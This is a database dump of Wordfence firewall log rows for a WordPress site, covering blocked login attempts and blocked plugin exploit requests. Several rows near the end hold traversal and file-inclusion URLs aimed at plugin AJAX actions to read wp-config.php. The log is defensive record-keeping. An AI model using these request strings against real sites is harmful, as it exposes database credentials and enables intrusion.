(5094, 0.000000, 1595622920.961935, 0x00000000000000000000ffff23e44751, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://www.farmaciarepublicaargentina.com/wp-login.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5095, 0.000000, 1595628837.827009, 0x00000000000000000000ffffb956a46b, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5096, 0.000000, 1595635181.901037, 0x00000000000000000000ffffb955bfc9, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5097, 0.000000, 1595642892.980663, 0x00000000000000000000ffff23f04289, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://familylifeqia.com/wp-login.php', 'Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.12', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5098, 0.000000, 1595646948.437363, 0x00000000000000000000ffffb956a46c, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5099, 0.000000, 1595655126.455489, 0x00000000000000000000ffffb956a462, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5100, 0.000000, 1595660829.197918, 0x00000000000000000000ffff178140b5, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(5101, 0.000000, 1595664672.608094, 0x00000000000000000000ffff226b76da, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://www.versaillesumc.org/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5102, 0.000000, 1595667499.086496, 0x00000000000000000000ffffb956a46f, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5103, 0.000000, 1595670248.301674, 0x00000000000000000000ffff226b76da, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://autobedrijfheussen.be/wp-login.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5104, 0.000000, 1595673179.270117, 0x00000000000000000000ffffb956a704, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5105, 0.000000, 1595682676.432015, 0x00000000000000000000ffffb955eef4, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5106, 0.000000, 1595694070.361945, 0x00000000000000000000ffffb956a467, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5107, 0.000000, 1595696670.136273, 0x00000000000000000000ffff225a06c8, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://www.blurfilms.tv/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5108, 0.000000, 1595700603.199014, 0x00000000000000000000ffffb955be84, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5109, 0.000000, 1595704827.334218, 0x00000000000000000000ffffd4810332, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5110, 0.000000, 1595707637.945102, 0x00000000000000000000ffff3ed2073b, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5111, 0.000000, 1595712143.847973, 0x00000000000000000000ffffb956a46a, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5112, 0.000000, 1595724303.065662, 0x00000000000000000000ffff226b76da, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://www.punchlinesworld.com/wp-login.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5113, 1595727110.456197, 1595727110.328000, 0x00000000000000000000ffff52a576f9, 0, 403, 0, 0, 0, 'http://ze-dent.com/wp-admin/admin-ajax.php', NULL, 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0', 'blocked:waf', 'Slider Revolution: Arbitrary File Upload', '{\"learningMode\":0,\"failedRules\":\"60\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L3Zhci93d3cvdmhvc3RzL3plLWRlbnQuY29tL2h0dHBkb2NzL3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"file_upload\",\"ssl\":0}'),
(5114, 0.000000, 1595733443.113112, 0x00000000000000000000ffffb955bfc9, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5115, 0.000000, 1595734313.612268, 0x00000000000000000000ffff23f04289, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://www.aquanef.fr/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5116, 0.000000, 1595737938.294361, 0x00000000000000000000ffffd4813de4, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5117, 0.000000, 1595740486.296035, 0x00000000000000000000ffffb956a704, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5118, 0.000000, 1595740746.917228, 0x00000000000000000000ffff3ed2073b, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5119, 0.000000, 1595747746.078300, 0x00000000000000000000ffff226b76da, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://pap-ar.com/wp-login.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5120, 0.000000, 1595753737.498693, 0x00000000000000000000ffffb956a462, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5121, 0.000000, 1595759128.391384, 0x00000000000000000000ffffb9dc6512, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5122, 0.000000, 1595762735.881360, 0x00000000000000000000ffffb956a46b, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5123, 0.000000, 1595770965.948417, 0x00000000000000000000ffff330f93bd, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5124, 0.000000, 1595773247.211901, 0x00000000000000000000ffffd4812097, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5125, 0.000000, 1595776228.088297, 0x00000000000000000000ffffb956a46e, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5126, 0.000000, 1595779000.050570, 0x00000000000000000000ffffb955ef6e, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5127, 1595779745.615073, 1595779745.539300, 0x00000000000000000000ffffc146507b, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Slider Revolution: Local File Inclusion', '{\"learningMode\":0,\"failedRules\":\"2\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L3Zhci93d3cvdmhvc3RzL3plLWRlbnQuY29tL2h0dHBkb2NzL3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5128, 0.000000, 1595780671.934979, 0x00000000000000000000ffff226b76da, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://woodturningtv.com/wp-login.php', 'Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.12', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5129, 0.000000, 1595791795.275896, 0x00000000000000000000ffffb956a465, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5130, 0.000000, 1595797261.173017, 0x00000000000000000000ffffd48134c6, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5131, 0.000000, 1595798121.097278, 0x00000000000000000000ffff225a06c8, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://husaberg-winkler.at/administrator/', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5132, 0.000000, 1595799434.396190, 0x00000000000000000000ffffd4538d59, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(5133, 0.000000, 1595801666.843415, 0x00000000000000000000ffffb955bfc4, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5134, 0.000000, 1595814166.279150, 0x00000000000000000000ffffb955ef6e, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5135, 0.000000, 1595815012.581834, 0x00000000000000000000ffff225a06c8, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://www.shiretoko-club.jp/wp-login.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5136, 0.000000, 1595818491.234997, 0x00000000000000000000ffffb2207bcb, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0', 'loginFailInvalidUsername', NULL, NULL),
(5137, 0.000000, 1595823867.883552, 0x00000000000000000000ffffd4813de4, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5138, 0.000000, 1595826236.557748, 0x00000000000000000000ffffd4812097, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5139, 0.000000, 1595832519.566764, 0x00000000000000000000ffffb956a46e, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5140, 0.000000, 1595845140.797257, 0x00000000000000000000ffffd06d0e66, 0, 503, 0, 0, 0, 'http://www.ze-dent.com//wp-login.php', 'http://www.ze-dent.com//wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5141, 0.000000, 1595845746.190166, 0x00000000000000000000ffffd06d0e66, 0, 200, 0, 0, 0, 'http://www.ze-dent.com//wp-login.php', 'http://www.ze-dent.com//wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(5142, 0.000000, 1595845751.285698, 0x00000000000000000000ffffd06d0e66, 0, 503, 0, 0, 0, 'http://www.ze-dent.com//wp-login.php', 'http://www.ze-dent.com//wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5143, 0.000000, 1595846324.686847, 0x00000000000000000000ffffb956a46f, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5144, 0.000000, 1595851305.816998, 0x00000000000000000000ffffb955efc3, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5145, 0.000000, 1595864196.225058, 0x00000000000000000000ffffb956a46d, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5146, 0.000000, 1595868162.908520, 0x00000000000000000000ffff96810818, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(5147, 0.000000, 1595870169.785330, 0x00000000000000000000ffffb955eef4, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5148, 0.000000, 1595881763.326039, 0x00000000000000000000ffffb956a46d, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5149, 0.000000, 1595887744.277098, 0x00000000000000000000ffff224ca5e3, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://brightwillowstage.com/wp-login.php', 'Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.12', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5150, 0.000000, 1595891015.325863, 0x00000000000000000000ffffb9560dd5, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5151, 0.000000, 1595900446.684323, 0x00000000000000000000ffffb955bfc9, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5152, 0.000000, 1595902757.202426, 0x00000000000000000000ffff23e41b69, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://wommelgem-leeft.be/wp-login.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5153, 0.000000, 1595910800.907564, 0x00000000000000000000ffffb9dc65ce, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(5154, 0.000000, 1595921493.234094, 0x00000000000000000000ffff224ca5e3, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://www.ramackers.be/wp-login.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5155, 0.000000, 1595931606.824496, 0x00000000000000000000ffffb9560dd5, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5156, 0.000000, 1595941484.846756, 0x00000000000000000000ffffc1a9fc25, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5157, 1595941487.053034, 1595941486.913700, 0x00000000000000000000ffffc1a9fc25, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(5158, 0.000000, 1595945187.447827, 0x00000000000000000000ffffb956a466, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5159, 0.000000, 1595949020.913132, 0x00000000000000000000ffffb955ef6e, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5160, 0.000000, 1595955235.792545, 0x00000000000000000000ffff23e41b69, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://www.profilepilates.co.uk/wp-login.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5161, 1595955762.290405, 1595955762.273000, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Slider Revolution: Local File Inclusion', '{\"learningMode\":0,\"failedRules\":\"2\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L3Zhci93d3cvdmhvc3RzL3plLWRlbnQuY29tL2h0dHBkb2NzL3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5162, 1595955762.066386, 1595955761.941700, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5163, 1595955765.556229, 1595955765.530800, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-admin/admin-ajax.php?action=kbslider_show_image&img=..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5164, 1595955765.466473, 1595955765.445700, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t0aHVtYl0=\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5165, 1595955765.381217, 1595955765.360000, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-admin/admin-ajax.php?action=..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thY3Rpb25d\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
